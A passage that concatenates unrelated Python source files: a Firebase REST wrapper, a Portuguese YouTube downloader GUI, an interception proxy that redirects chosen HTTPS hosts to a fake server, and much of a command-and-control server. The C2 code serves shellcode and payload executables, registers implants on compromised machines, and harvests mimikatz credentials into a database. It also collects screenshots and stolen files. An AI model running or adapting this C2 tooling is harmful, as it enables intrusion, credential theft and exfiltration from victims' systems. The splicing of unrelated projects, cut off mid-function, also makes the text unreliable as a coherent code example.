return request_object.json()
def remove(self, token=None):
request_ref = self.check_token(self.database_url, self.path, token)
self.path = ""
headers = self.build_headers(token)
request_object = self.requests.delete(request_ref, headers=headers)
raise_detailed_error(request_object)
return request_object.json()
def stream(self, stream_handler, token=None, stream_id=None):
request_ref = self.build_request_url(token)
return Stream(request_ref, stream_handler, self.build_headers, stream_id)
def check_token(self, database_url, path, token):
if token:
return '{0}{1}.json?auth={2}'.format(database_url, path, token)
else:
return '{0}{1}.json'.format(database_url, path)
def generate_key(self):
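        # Mirrors Firebase push-ID generation: 8 characters encode the current
        # millisecond timestamp in the 64-character alphabet below, followed by
        # 12 random characters; keys generated in the same millisecond bump the
        # random suffix so later keys still sort after earlier ones.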
push_chars = '-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz'
now = int(time.time() * 1000)
duplicate_time = now == self.last_push_time
self.last_push_time = now
time_stamp_chars = [0] * 8
for i in reversed(range(0, 8)):
time_stamp_chars[i] = push_chars[now % 64]
now = int(math.floor(now / 64))
new_id = "".join(time_stamp_chars)
if not duplicate_time:
for i in range(0, 12):
self.last_rand_chars.append(int(math.floor(uniform(0, 1) * 64)))
else:
for i in range(0, 11):
if self.last_rand_chars[i] == 63:
self.last_rand_chars[i] = 0
self.last_rand_chars[i] += 1
for i in range(0, 12):
new_id += push_chars[self.last_rand_chars[i]]
return new_id
def sort(self, origin, by_key):
# unpack pyre objects
pyres = origin.each()
new_list = []
for pyre in pyres:
new_list.append(pyre.item)
# sort
data = sorted(dict(new_list).items(), key=lambda item: item[1][by_key])
return PyreResponse(convert_to_pyre(data), origin.key())
class Storage:
""" Storage Service """
def __init__(self, credentials, storage_bucket, requests):
self.storage_bucket = "https://firebasestorage.googleapis.com/v0/b/" + storage_bucket
self.credentials = credentials
self.requests = requests
self.path = ""
if credentials:
client = storage.Client(credentials=credentials, project=storage_bucket)
self.bucket = client.get_bucket(storage_bucket)
def child(self, *args):
new_path = "/".join(args)
if self.path:
self.path += "/{}".format(new_path)
else:
if new_path.startswith("/"):
new_path = new_path[1:]
self.path = new_path
return self
def put(self, file, token=None):
# reset path
path = self.path
self.path = None
if isinstance(file, str):
file_object = open(file, 'rb')
else:
file_object = file
request_ref = self.storage_bucket + "/o?name={0}".format(path)
if token:
headers = {"Authorization": "Firebase " + token}
request_object = self.requests.post(request_ref, headers=headers, data=file_object)
raise_detailed_error(request_object)
return request_object.json()
elif self.credentials:
blob = self.bucket.blob(path)
if isinstance(file, str):
return blob.upload_from_filename(filename=file)
else:
return blob.upload_from_file(file_obj=file)
else:
request_object = self.requests.post(request_ref, data=file_object)
raise_detailed_error(request_object)
return request_object.json()
def delete(self, name):
self.bucket.delete_blob(name)
def download(self, filename, token=None):
        # remove the leading slash from the path
path = self.path
url = self.get_url(token)
self.path = None
if path.startswith('/'):
path = path[1:]
if self.credentials:
blob = self.bucket.get_blob(path)
blob.download_to_filename(filename)
else:
r = requests.get(url, stream=True)
if r.status_code == 200:
with open(filename, 'wb') as f:
for chunk in r:
f.write(chunk)
def get_url(self, token):
path = self.path
self.path = None
if path.startswith('/'):
path = path[1:]
if token:
return "{0}/o/{1}?alt=media&token={2}".format(self.storage_bucket, quote(path, safe=''), token)
return "{0}/o/{1}?alt=media".format(self.storage_bucket, quote(path, safe=''))
def list_files(self):
return self.bucket.list_blobs()
def raise_detailed_error(request_object):
try:
request_object.raise_for_status()
except HTTPError as e:
# raise detailed error message
# TODO: Check if we get a { "error" : "Permission denied." } and handle automatically
raise HTTPError(e, request_object.text)
def convert_to_pyre(items):
pyre_list = []
for item in items:
pyre_list.append(Pyre(item))
return pyre_list
def convert_list_to_pyre(items):
pyre_list = []
for item in items:
pyre_list.append(Pyre([items.index(item), item]))
return pyre_list
class PyreResponse:
def __init__(self, pyres, query_key):
self.pyres = pyres
self.query_key = query_key
def val(self):
if isinstance(self.pyres, list):
# unpack pyres into OrderedDict
pyre_list = []
# if firebase response was a list
if isinstance(self.pyres[0].key(), int):
for pyre in self.pyres:
pyre_list.append(pyre.val())
return pyre_list
# if firebase response was a dict with keys
for pyre in self.pyres:
pyre_list.append((pyre.key(), pyre.val()))
return OrderedDict(pyre_list)
else:
# return primitive or simple query results
return self.pyres
def key(self):
return self.query_key
def each(self):
if isinstance(self.pyres, list):
return self.pyres
class Pyre:
def __init__(self, item):
self.item = item
def val(self):
return self.item[1]
def key(self):
return self.item[0]
class KeepAuthSession(Session):
"""
A session that doesn't drop Authentication on redirects between domains.
"""
def rebuild_auth(self, prepared_request, response):
pass
class ClosableSSEClient(SSEClient):
def __init__(self, *args, **kwargs):
self.should_connect = True
super(ClosableSSEClient, self).__init__(*args, **kwargs)
def _connect(self):
if self.should_connect:
super(ClosableSSEClient, self)._connect()
else:
raise StopIteration()
def close(self):
self.should_connect = False
self.retry = 0
self.resp.raw._fp.fp.raw._sock.shutdown(socket.SHUT_RDWR)
self.resp.raw._fp.fp.raw._sock.close()
class Stream:
def __init__(self, url, stream_handler, build_headers, stream_id):
self.build_headers = build_headers
self.url = url
self.stream_handler = stream_handler
self.stream_id = stream_id
self.sse = None
self.thread = None
self.start()
def make_session(self):
"""
Return a custom session object to be passed to the ClosableSSEClient.
"""
session = KeepAuthSession()
return session
def start(self):
self.thread = threading.Thread(target=self.start_stream)
self.thread.start()
return self
def start_stream(self):
self.sse = ClosableSSEClient(self.url, session=self.make_session(), build_headers=self.build_headers)
for msg in self.sse:
if msg:
msg_data = json.loads(msg.data)
msg_data["event"] = msg.event
if self.stream_id:
msg_data["stream_id"] = self.stream_id
self.stream_handler(msg_data)
def close(self):
        while not self.sse or not hasattr(self.sse, 'resp'):  # wait until the SSE client exists and has an open response
time.sleep(0.001)
self.sse.running = False
self.sse.close()
self.thread.join()
return self
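

# --- Usage sketch (illustrative only, not part of the original module) ---
# A minimal example of how this wrapper is typically driven. The config values
# are hypothetical placeholders, not real project credentials, and the network
# call itself is left commented out.
if __name__ == "__main__":
    example_config = {
        "apiKey": "YOUR_API_KEY",
        "authDomain": "example-project.firebaseapp.com",
        "databaseURL": "https://example-project.firebaseio.com",
        "storageBucket": "example-project.appspot.com",
    }
    firebase = lets_do_it(example_config)
    db = firebase.database()
    # Builder calls chain and only touch the network on get()/set()/push():
    # print(db.child("users").order_by_key().limit_to_first(5).get().val())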
|
main.py
|
from tkinter import *
from tkinter import messagebox
from tkinter.font import Font
from tkinter import filedialog
from ytbdownloader import *
from threading import Thread
def choise_path():
global savelocal
savelocal = str(filedialog.askdirectory())
label_saveWhere.config(text=savelocal[savelocal.rfind('/')+1:], anchor=CENTER)
def download():
url = tb_url.get()
op = option.get()
try:
yt = YtbDownloader()
if chkvalue.get():
yt.download_playlist(url=url, savelocal=savelocal, tomp3=op)
else:
if op:
yt.download_and_convertmp3(url=url, savelocal=savelocal)
else:
yt.download_video(url=url, savelocal=savelocal)
except Exception as exc:
print(exc)
messagebox.showerror(title=":(", message="HOUVE UM PROBLEMA, VERIFIQUE A URL DO VIDEO")
else:
messagebox.showinfo(title=":)", message="BAIXADO COM SUCESSO")
tb_url.delete(0, END)
app = Tk()
savelocal = None
option = BooleanVar()
app.geometry("400x300")
app.configure(background='orange')
font = Font(size=10, weight='bold')
Label(app, text="YOUTUBER DOWNLOADER", font=font).place(x=100, y=5, height=25, width=200)
Label(app, text="URL DO VIDEO: ", font=font).place(x=140, y=35, height=25, width=120)
tb_url = Entry(app)
tb_url.place(x=75, y=65, height=25, width=250)
Label(app, text="PLAYLIST", font=font).place(x=140, y=95, width=90, height=25)
chkvalue = BooleanVar()
chkvalue.set(False)
chkbuttom = Checkbutton(app, var=chkvalue)
chkbuttom.place(x=235, y=95, width=30, height=25)
Button(app, text="DIRETORIO:", command=choise_path, font=font).place(x=75, y=125, height=25, width=120)
label_saveWhere = Label(app, text='', font=font, anchor=W)
label_saveWhere.place(x=200, y=125, height=25, width=125)
Rb1 = Radiobutton(app, text="MÚSICA(MP3)", background='white', font=font, variable=option, value=True)
Rb1.place(x=50, y=170, height=25, width=120)
Rb2 = Radiobutton(app, text="VÍDEO(MP4)", font=font, background='white', variable=option, value=False)
Rb2.place(x=230, y=170, height=25, width=120)
#task = Thread(target=download)
Button(app, text="BAIXAR", font=font, command=download).place(x=140, y=220, height=25, width=120)
app.mainloop()
|
ProxyServer.py
|
__author__ = 'n3k'
import SocketServer
import time
import socket
from select import select
from HttpData import HttpRequest, HttpResponse, HttpDataException
from Logger import Logger
from ProxyModeTestController import TestProxyModeController
from TestController import TestControllerException
from Configuration import Configuration
class ProxyThreadedServer(SocketServer.ThreadingTCPServer):
def __init__(self, server_address, RequestHandlerClass):
SocketServer.ThreadingTCPServer.__init__(self, server_address, RequestHandlerClass)
self.allow_reuse_address = True
class Destination(object):
"""
This is used because some browsers (like Firefox) use a single socket
to send data to different hosts
"""
def __init__(self, socket_connection, host, port, address):
self.socket_connection = socket_connection
self.host = host
self.port = port
self.address = address
class ProxyHandler(SocketServer.BaseRequestHandler):
"""
This is an asynchronous handler
"""
timeout = None
# Disable nagle algorithm for this socket, if True.
disable_nagle_algorithm = False
def __init__(self, request, client_address, server):
self.http_data = None
self.current_socket = None
self.keep_alive = False
self.readable_sockets = []
self.destination_list = []
self.current_destination = None
SocketServer.BaseRequestHandler.__init__(self, request, client_address, server)
def setup(self):
self.connection = self.request
if self.timeout is not None:
self.connection.settimeout(self.timeout)
if self.disable_nagle_algorithm:
self.connection.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, True)
self.readable_sockets.append(self.request)
def handle(self):
if self._read_initial_client_request() > 0:
if self.http_data.request_method == "CONNECT":
self.process_connect()
else:
self.process_generic_request()
def finish(self):
self.request.close()
for destination in self.destination_list:
try:
destination.socket_connection.close()
except:
pass
def _read_initial_client_request(self):
"""
        Reads the client socket and returns the number of bytes received
"""
try:
self.http_data = HttpRequest.parse(self._recv_timeout(self.request))
return len(self.http_data)
except HttpDataException:
return 0
def get_destination_from_data(self):
host, port = self._get_host_and_port()
#print host, port
address = socket.gethostbyname(host)
for destination in self.destination_list:
if destination.host == host and destination.port == port and destination.address == address:
return destination
# If we don't find it, create a new Destination object
connection = self.create_connection(address, port)
new_destination = Destination(connection, host, port, address)
self.destination_list.append(new_destination)
return new_destination
def process_generic_request(self):
# Set keep_alive if necessary
if self.http_data.has_keepalive():
self.keep_alive = True
self.current_destination = self.get_destination_from_data()
# Set up the forward channel
self.forward_http_channel()
def create_connection(self, address, port):
"""
Creates connection with the destination and adds the socket to the readable list
"""
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((address, port))
self.readable_sockets.append(s)
return s
except Exception as e:
Logger().log_error("## {0} - While trying to connect to {1} at port {2}".format(e.message, address, port))
return None
def forward_http_channel(self):
# Send the already parsed data (the first request)
self.send_data(socket_to=self.current_destination.socket_connection, data=repr(self.http_data))
# Channel loop
if self.keep_alive:
while self.keep_alive:
self._forward_remaining_data()
else:
# Send and receive the data and finish the thing
self.send_data(socket_to=self.request, data=self._recv_timeout(self.current_destination.socket_connection))
def _forward_remaining_data(self):
"""
Reads data from the socket list and forwards properly
"""
timeout = 10
readable, writable, exceptional = select(self.readable_sockets, [], [], timeout)
for self.current_socket in readable:
data = self._recv_timeout(self.current_socket)
if self.current_socket is self.request:
                # We know this is an HTTP request
try:
self.http_data = HttpRequest.parse(data)
# Some clients re-use the socket established with the proxy to send
# data to several hosts
self.current_destination = self.get_destination_from_data()
if not self.http_data.has_keepalive():
self.keep_alive = False
except HttpDataException:
#self.readable_sockets.remove(self.request)
continue
else:
                # We know this is an HTTP response or response body data
try:
self.http_data = HttpResponse.parse(data)
except HttpDataException:
# It could be something else like a chunked response or who knows xD
if len(data) > 0:
# In this particular case, send data directly
self.send_data(socket_to=self.request, data=data)
else:
self.readable_sockets.remove(self.current_destination.socket_connection)
self.destination_list.remove(self.current_destination)
self.keep_alive = False
continue
self.send_data(socket_to=self.__get_peer_socket(), data=repr(self.http_data))
def send_data(self, socket_to, data):
#().log_http(self.http_data)
#print self.http_data
try:
socket_to.sendall(data)
except Exception as e:
print e.message
self.keep_alive = False
def __get_peer_socket(self):
if self.current_socket is self.request:
return self.current_destination.socket_connection
return self.request
def process_connect(self):
# Set keep_alive if necessary
if self.http_data.has_keepalive():
self.keep_alive = True
self.current_destination = self.get_destination_from_data()
# Else Reply 200 Connection Established and forward data
self.send_data(socket_to=self.request, data="HTTP/1.0 200 Connection established\r\n\r\n")
# Forward data
self.forward_https_channel()
def forward_https_channel(self):
timeout = 10
if self.keep_alive:
while self.keep_alive:
readable, writable, exceptional = select(self.readable_sockets, [], [], timeout)
for self.current_socket in readable:
try:
data = self._recv_timeout(self.current_socket)
self.send_data(socket_to=self.__get_peer_socket(), data=data)
except:
return
if len(readable) == 0:
return
def _recv_timeout(self, s, timeout=0.5):
#make socket non blocking
s.setblocking(0)
total_data = []
data = ''
#beginning time
begin = time.time()
while True:
#if you got some data, then break after timeout
if total_data and time.time()-begin > timeout:
break
#if you got no data at all, wait a little longer, twice the timeout
elif time.time()-begin > timeout*2:
break
#recv chunks of 0x2000
try:
data = s.recv(0x2000)
if data:
total_data.append(data)
#change the beginning time for measurement
begin = time.time()
else:
#sleep for sometime to indicate a gap
time.sleep(0.1)
except:
pass
return ''.join(total_data)
def _get_host_and_port(self):
if ":" in self.http_data.host:
host, port = self.http_data.host.split(":")
port = int(port)
# just in case a whitespace is there
host = host.strip()
else:
host = self.http_data.host.strip()
if self.http_data.request_method == "CONNECT":
port = 443
else:
port = 80
return host, port
class ProxyHandlerCertificateTest(ProxyHandler):
def setup(self):
ProxyHandler.setup(self)
self.client_address = self.request.getsockname()[0]
def finish(self):
"""Overwrite the finish() to include the killing of the web_server"""
if self.current_destination:
TestProxyModeController.instance(self.client_address,
self.current_destination.host,
self.current_destination.port).cleanup()
ProxyHandler.finish(self)
def redirect_destination(self):
#try:
server_address = TestProxyModeController.instance(self.client_address,
self.current_destination.host,
self.current_destination.port).configure_web_server()
        if server_address is None:
return
if Configuration().verbose_mode:
print "Web Server for host %s listening at %s on port %d" % (self.current_destination.host, server_address[0], server_address[1])
#except TestControllerException:
# This means the TestSuite finished, do not redirect anymore
#return
address, port = server_address
# Remove the created connection to the original destination
self.readable_sockets.remove(self.current_destination.socket_connection)
# Create the new connection to our fake server
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(server_address)
self.readable_sockets.append(s)
self.current_destination.socket_connection = s
except Exception as e:
Logger().log_error("## FakeServer connection error - While trying to connect to {1} at port {2}".format(address, port))
def process_connect(self):
# Set keep_alive if necessary
if self.http_data.has_keepalive():
self.keep_alive = True
self.current_destination = self.get_destination_from_data()
if TestProxyModeController.match_monitored_domains(self.current_destination.host):
self.redirect_destination()
# Else Reply 200 Connection Established and forward data
self.send_data(socket_to=self.request, data="HTTP/1.0 200 Connection established\r\n\r\n")
# Forward data
self.forward_https_channel()
class ProxyServer(object):
def __init__(self, server_address=("0.0.0.0", 8080), proxy_handler=ProxyHandler):
self.server_address = server_address
self.proxy_handler = proxy_handler
def start(self):
server = ProxyThreadedServer(self.server_address, self.proxy_handler)
server.serve_forever()
#proxy = threading.Thread(target=server.serve_forever)
#proxy.setDaemon(True)
#proxy.start()
if __name__ == "__main__":
proxy = ProxyServer()
proxy.start()
|
C2Server.py
|
#!/usr/bin/env python3
import os, sys, datetime, time, base64, logging, signal, re, ssl, traceback, threading
from urllib.request import urlopen, Request
from urllib.error import HTTPError, URLError
from Implant import Implant
from Tasks import newTask
from Core import decrypt, encrypt, default_response, decrypt_bytes_gzip
from Colours import Colours
from DB import select_item, get_implants_all, update_implant_lastseen, update_task, get_cmd_from_task_id, get_c2server_all, get_sharpurls
from DB import update_item, get_task_owner, get_newimplanturl, initializedb, setupserver, new_urldetails, get_baseenckey, insert_cred, get_c2_messages
from Payloads import Payloads
from Config import ROOTDIR, ServerHeader, PayloadsDirectory, HTTPResponse, DownloadsDirectory, Database, HostnameIP, SocksHost
from Config import QuickCommand, KillDate, DefaultSleep, DomainFrontHeader, ServerPort, urlConfig, HOST_NAME, PORT_NUMBER
from Config import DownloadURI, Sounds, APIKEY, MobileNumber, URLS, SocksURLS, Insecure, UserAgent, Referrer, APIToken
from Config import APIUser, EnableNotifications
from Cert import create_self_signed_cert
from Help import logopic
from Utils import validate_sleep_time, randomuri, gen_key
from socketserver import ThreadingMixIn
from http.server import BaseHTTPRequestHandler, HTTPServer
def process_mimikatz(lines):
# code source https://github.com/stufus/parse-mimikatz-log/blob/master/pml.py
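    # Expected input shape (illustrative lines only, not real credentials):
    #     * Username : jdoe
    #     * Domain   : CORP
    #     * NTLM     : 0123456789abcdef0123456789abcdef
    # Each complete Username/Domain/NTLM-or-Password block results in one
    # insert_cred() call below.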
main_count = 0
current = {}
for line in lines.split('\n'):
main_count += 1
val = re.match(r'^\s*\*\s+Username\s+:\s+(.+)\s*$', line.strip())
if val is not None:
current = {}
current['Username'] = val.group(1).strip()
if current['Username'] == '(null)':
current['Username'] = None
continue
val = re.match(r'^\s*\*\s+Domain\s+:\s+(.+)\s*$', line.strip())
if val is not None:
current['Domain'] = val.group(1).strip()
if current['Domain'] == '(null)':
current['Domain'] = None
continue
val = re.match(r'^\s*\*\s+(NTLM|Password)\s+:\s+(.+)\s*$', line.strip())
if val is not None and "Username" in current and "Domain" in current:
if val.group(2).count(" ") < 10:
current[val.group(1).strip()] = val.group(2)
if val.group(1) == "Password":
if val.group(2) == '(null)':
continue
insert_cred(current['Domain'], current['Username'], current['Password'], None)
elif val.group(1) == "NTLM":
if val.group(2) == '(null)':
continue
insert_cred(current['Domain'], current['Username'], None, current['NTLM'])
class MyHandler(BaseHTTPRequestHandler):
def signal_handler(signal, frame):
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
def log_message(self, format, *args):
try:
useragent = str(self.headers['user-agent'])
except Exception:
useragent = "None"
open("%swebserver.log" % ROOTDIR, "a").write("%s - [%s] %s %s\n" %
(self.address_string(), self.log_date_time_string(), format % args, useragent))
def do_HEAD(s):
"""Respond to a HEAD request."""
s.server_version = ServerHeader
s.sys_version = ""
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
def do_OPTIONS(s):
"""Respond to a HEAD request."""
s.server_version = ServerHeader
s.sys_version = ""
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
def do_PUT(s):
"""Respond to a PUT request."""
s.server_version = ServerHeader
s.sys_version = ""
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
def do_GET(s):
"""Respond to a GET request."""
logging.info("GET request,\nPath: %s\nHeaders:\n%s\n", str(s.path), str(s.headers))
new_implant_url = get_newimplanturl()
s.cookieHeader = s.headers.get('Cookie')
QuickCommandURI = select_item("QuickCommand", "C2Server")
UriPath = str(s.path)
sharpurls = get_sharpurls().split(",")
sharplist = []
for i in sharpurls:
i = i.replace(" ", "")
i = i.replace("\"", "")
sharplist.append("/" + i)
s.server_version = ServerHeader
s.sys_version = ""
if not s.cookieHeader:
s.cookieHeader = "NONE"
# implant gets a new task
new_task = newTask(s.path)
if new_task:
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(new_task)
elif [ele for ele in sharplist if(ele in UriPath)]:
try:
open("%swebserver.log" % ROOTDIR, "a").write("%s - [%s] Making GET connection to SharpSocks %s%s\r\n" % (s.address_string(), s.log_date_time_string(), SocksHost, UriPath))
r = Request("%s%s" % (SocksHost, UriPath), headers={'Accept-Encoding': 'gzip', 'Cookie': '%s' % s.cookieHeader, 'User-Agent': UserAgent})
res = urlopen(r)
sharpout = res.read()
s.send_response(200)
s.send_header("Content-type", "text/html")
s.send_header("Connection", "close")
s.send_header("Content-Length", len(sharpout))
s.end_headers()
if (len(sharpout) > 0):
s.wfile.write(sharpout)
except HTTPError as e:
s.send_response(e.code)
s.send_header("Content-type", "text/html")
s.send_header("Connection", "close")
s.end_headers()
open("%swebserver.log" % ROOTDIR, "a").write("[-] Error with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc()))
open("%swebserver.log" % ROOTDIR, "a").write("[-] SharpSocks %s\r\n" % e)
except Exception as e:
open("%swebserver.log" % ROOTDIR, "a").write("[-] Error with SharpSocks - is SharpSocks running %s%s \r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc()))
open("%swebserver.log" % ROOTDIR, "a").write("[-] SharpSocks %s\r\n" % e)
print(Colours.RED + "Error with SharpSocks or old implant connection - is SharpSocks running" + Colours.END)
print(Colours.RED + UriPath + Colours.END)
s.send_response(404)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(bytes(HTTPResponse, "utf-8"))
elif ("%s_bs" % QuickCommandURI) in s.path:
filename = "%spayload.bat" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(content)
elif ("%s_rg" % QuickCommandURI) in s.path:
filename = "%srg_sct.xml" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(content)
elif ("%ss/86/portal" % QuickCommandURI) in s.path:
filename = "%sSharp_v4_x86_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(content)
elif ("%ss/64/portal" % QuickCommandURI) in s.path:
filename = "%sSharp_v4_x64_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(content)
elif ("%sp/86/portal" % QuickCommandURI) in s.path:
filename = "%sPosh_v4_x86_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(content)
elif ("%sp/64/portal" % QuickCommandURI) in s.path:
filename = "%sPosh_v4_x64_Shellcode.bin" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = base64.b64encode(content)
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(content)
elif ("%s_cs" % QuickCommandURI) in s.path:
filename = "%scs_sct.xml" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(content)
elif ("%s_py" % QuickCommandURI) in s.path:
filename = "%saes.py" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
content = "a" + "".join("{:02x}".format(c) for c in content)
s.send_response(200)
s.send_header("Content-type", "text/plain")
s.end_headers()
s.wfile.write(bytes(content, "utf-8"))
elif ("%s_ex86" % QuickCommandURI) in s.path:
filename = "%sPosh32.exe" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
s.send_response(200)
s.send_header("Content-type", "application/x-msdownload")
s.end_headers()
s.wfile.write(content)
elif ("%s_ex64" % QuickCommandURI) in s.path:
filename = "%sPosh64.exe" % (PayloadsDirectory)
with open(filename, 'rb') as f:
content = f.read()
s.send_response(200)
s.send_header("Content-type", "application/x-msdownload")
s.end_headers()
s.wfile.write(content)
# register new implant
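        # The SessionID cookie carries an encrypted, semicolon-delimited host
        # fingerprint (Domain;User;Hostname;Arch;PID;Proxy for the PowerShell/C#
        # implants, User;Domain;... for Python), and the query string suffix
        # (?p, ?d, ?m, ?c) selects the implant type handled below.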
elif new_implant_url in s.path and s.cookieHeader.startswith("SessionID"):
implant_type = "PS"
if s.path == ("%s?p" % new_implant_url):
implant_type = "PS Proxy"
if s.path == ("%s?d" % new_implant_url):
implant_type = "PS Daisy"
if s.path == ("%s?m" % new_implant_url):
implant_type = "Python"
if s.path == ("%s?d?m" % new_implant_url):
implant_type = "Python Daisy"
if s.path == ("%s?p?m" % new_implant_url):
implant_type = "Python Proxy"
if s.path == ("%s?c" % new_implant_url):
implant_type = "C#"
if s.path == ("%s?d?c" % new_implant_url):
implant_type = "C# Daisy"
if s.path == ("%s?p?c" % new_implant_url):
implant_type = "C# Proxy"
if implant_type.startswith("C#"):
cookieVal = (s.cookieHeader).replace("SessionID=", "")
decCookie = decrypt(KEY, cookieVal)
IPAddress = "%s:%s" % (s.client_address[0], s.client_address[1])
Domain, User, Hostname, Arch, PID, Proxy = decCookie.split(";")
Proxy = Proxy.replace("\x00", "")
if "\\" in User:
User = User[User.index("\\") + 1:]
newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, Proxy)
newImplant.save()
newImplant.display()
responseVal = encrypt(KEY, newImplant.SharpCore)
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(responseVal)
elif implant_type.startswith("Python"):
cookieVal = (s.cookieHeader).replace("SessionID=", "")
decCookie = decrypt(KEY, cookieVal)
IPAddress = "%s:%s" % (s.client_address[0], s.client_address[1])
User, Domain, Hostname, Arch, PID, Proxy = decCookie.split(";")
Proxy = Proxy.replace("\x00", "")
newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, Proxy)
newImplant.save()
newImplant.display()
responseVal = encrypt(KEY, newImplant.PythonCore)
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(responseVal)
else:
try:
cookieVal = (s.cookieHeader).replace("SessionID=", "")
decCookie = decrypt(KEY.encode("utf-8"), cookieVal)
decCookie = str(decCookie)
Domain, User, Hostname, Arch, PID, Proxy = decCookie.split(";")
Proxy = Proxy.replace("\x00", "")
IPAddress = "%s:%s" % (s.client_address[0], s.client_address[1])
if "\\" in str(User):
User = User[str(User).index('\\') + 1:]
newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, Proxy)
newImplant.save()
newImplant.display()
newImplant.autoruns()
responseVal = encrypt(KEY, newImplant.PSCore)
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(responseVal)
except Exception as e:
print("Decryption error: %s" % e)
traceback.print_exc()
s.send_response(404)
s.send_header("Content-type", "text/html")
s.end_headers()
s.wfile.write(bytes(HTTPResponse, "utf-8"))
else:
s.send_response(404)
s.send_header("Content-type", "text/html")
s.end_headers()
HTTPResponsePage = select_item("HTTPResponse", "C2Server")
if HTTPResponsePage:
s.wfile.write(bytes(HTTPResponsePage, "utf-8"))
else:
s.wfile.write(bytes(HTTPResponse, "utf-8"))
def do_POST(s):
"""Respond to a POST request."""
try:
s.server_version = ServerHeader
s.sys_version = ""
try:
content_length = int(s.headers['Content-Length'])
except:
content_length = 0
s.cookieHeader = s.headers.get('Cookie')
try:
cookieVal = (s.cookieHeader).replace("SessionID=", "")
except:
cookieVal = ""
post_data = s.rfile.read(content_length)
logging.info("POST request,\nPath: %s\nHeaders:\n%s\n\nBody:\n%s\n", str(s.path), str(s.headers), post_data)
now = datetime.datetime.now()
result = get_implants_all()
for i in result:
implantID = i[0]
RandomURI = i[1]
Hostname = i[3]
encKey = i[5]
Domain = i[11]
User = i[2]
if RandomURI in s.path and cookieVal:
update_implant_lastseen(now.strftime("%d/%m/%Y %H:%M:%S"), RandomURI)
decCookie = decrypt(encKey, cookieVal)
rawoutput = decrypt_bytes_gzip(encKey, post_data[1500:])
if decCookie.startswith("Error"):
print(Colours.RED)
print("The multicmd errored: ")
print(rawoutput)
print(Colours.GREEN)
return
taskId = str(int(decCookie.strip('\x00')))
taskIdStr = "0" * (5 - len(str(taskId))) + str(taskId)
executedCmd = get_cmd_from_task_id(taskId)
task_owner = get_task_owner(taskId)
print(Colours.GREEN)
if task_owner is not None:
print("Task %s (%s) returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, task_owner, implantID, Domain, User, Hostname, now.strftime("%d/%m/%Y %H:%M:%S")))
else:
print("Task %s returned against implant %s on host %s\\%s @ %s (%s)" % (taskIdStr, implantID, Domain, User, Hostname, now.strftime("%d/%m/%Y %H:%M:%S")))
try:
outputParsed = re.sub(r'123456(.+?)654321', '', rawoutput)
outputParsed = outputParsed.rstrip()
except Exception:
pass
if "loadmodule" in executedCmd:
print("Module loaded successfully")
update_task(taskId, "Module loaded successfully")
elif "get-screenshot" in executedCmd.lower():
try:
decoded = base64.b64decode(outputParsed)
filename = i[3] + "-" + now.strftime("%m%d%Y%H%M%S_" + randomuri())
output_file = open('%s%s.png' % (DownloadsDirectory, filename), 'wb')
print("Screenshot captured: %s%s.png" % (DownloadsDirectory, filename))
update_task(taskId, "Screenshot captured: %s%s.png" % (DownloadsDirectory, filename))
output_file.write(decoded)
output_file.close()
except Exception:
update_task(taskId, "Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
print("Screenshot not captured, the screen could be locked or this user does not have access to the screen!")
elif (executedCmd.lower().startswith("$shellcode64")) or (executedCmd.lower().startswith("$shellcode64")):
update_task(taskId, "Upload shellcode complete")
print("Upload shellcode complete")
elif (executedCmd.lower().startswith("run-exe core.program core inject-shellcode")):
update_task(taskId, "Upload shellcode complete")
print(outputParsed)
elif "download-file" in executedCmd.lower():
try:
filename = executedCmd.lower().replace("download-file ", "")
filename = filename.replace("-source ", "")
filename = filename.replace("..", "")
filename = filename.replace("'", "")
filename = filename.replace('"', "")
filename = filename.rsplit('/', 1)[-1]
filename = filename.rsplit('\\', 1)[-1]
filename = filename.rstrip('\x00')
original_filename = filename
try:
if rawoutput.startswith("Error"):
print("Error downloading file: ")
print(rawoutput)
break
chunkNumber = rawoutput[:5]
totalChunks = rawoutput[5:10]
except Exception:
